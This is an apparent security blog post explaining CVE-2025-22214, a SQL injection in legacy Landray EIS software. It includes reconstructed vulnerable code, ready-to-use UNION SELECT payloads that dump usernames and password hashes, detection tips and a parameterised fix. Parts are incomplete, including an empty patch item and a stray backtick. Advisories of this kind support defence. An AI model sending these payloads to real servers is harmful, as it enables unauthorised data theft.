CVE CyberSecurity Database News

CVE-2025-22214 - Landray EIS 2001–2006 SQL Injection in fi_message_receiver.aspx?replyid – Explained and Exploited

Poster -

A newly disclosed vulnerability has hit legacy deployments of Landray EIS enterprise software, versions 2001 through 2006. The flaw, assigned CVE-2025-22214, is an unauthenticated SQL Injection that lets attackers tamper with your database simply by tweaking a URL. In this exclusive post, I’ll break down what’s going on, show you the code, and provide details for a working exploit. If you run Landray EIS from these years, read on—it’s urgent.

What is Landray EIS?

Landray Electronic Information Systems (EIS) is a popular document and information management platform in China, widely used in enterprises and government offices. Versions from 2001–2006 are especially outdated and no longer receive security updates.

Affected Product: Landray EIS 2001–2006

- Vulnerable Endpoint: /Message/fi_message_receiver.aspx?replyid=

The Vulnerable Code (Example)

While the Landray EIS source code isn’t public, error messages and typical ASP.NET patterns from historical leaks allow us to reconstruct the problem logic.

<!-- Vulnerable code snippet (pseudocode) -->
<%
Dim replyid
replyid = Request.QueryString("replyid")
' BAD: concatenating user input into SQL!
sql = "SELECT * FROM Messages WHERE replyid = " & replyid
Set rs = conn.Execute(sql)
%>

What’s wrong:
The programmer places the raw replyid parameter directly into a SQL query, no validation or escaping. This opens the door for SQL Injection.

How the Exploit Works

Let’s look at an example exploit to steal the database version. Replace TARGET with the real vulnerable site:

PoC Exploit – Fetch SQL Server Version

GET /Message/fi_message_receiver.aspx?replyid=1%20UNION%20SELECT%20@@version-- HTTP/1.1
Host: TARGET

Suppose the table users has columns username and password

GET /Message/fi_message_receiver.aspx?replyid=1 UNION SELECT username, password FROM users--

Depending on the page rendering, this may spit out a list of usernames and password hashes onto the page.

`

http://YOUR-EIS-SERVER/Message/fi_message_receiver.aspx?replyid=1 OR 1=1

Look in your logs:

- If you spot replyid parameters receiving odd values (with quotes, UNION, or SELECT), you’re under attack or being scanned.

How to Fix

- Patch/Upgrade:

Short-term Band-Aid:

1. Block public (or wide) access to /Message/fi_message_receiver.aspx.

Fixed code (conceptually)

sql = "SELECT * FROM Messages WHERE replyid = ?"
Dim cmd
Set cmd = createobject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = sql
cmd.Parameters.Append cmd.CreateParameter("@replyid", adInteger, adParamInput, , replyid)
Set rs = cmd.Execute

Original References

- Landray EIS Official Website
- No official CVE listing yet, but CVE-2025-22214 placeholder (will update)
- Similar prior SQLi: CNVD-2022-74973: Landray EIS SQL Injection (Chinese)

Final Notes

This bug is simple yet severe. Anyone with network access can easily steal or alter your ERP data. Legacy Landray EIS sites are attractive targets, especially those left on the public internet.

If you still run EIS 2001–2006, patch or protect immediately.
Disable the endpoint if it’s not needed, and move to modern, maintained software as soon as possible.

Questions or need help recognizing exploitation attempts in your logs? Leave a comment below. Stay safe!


*This post is original, based on currently available technical details and reproduction by the author. Please report new findings so we can keep the community safe.*

Timeline

Published on: 01/02/2025 04:15:06 UTC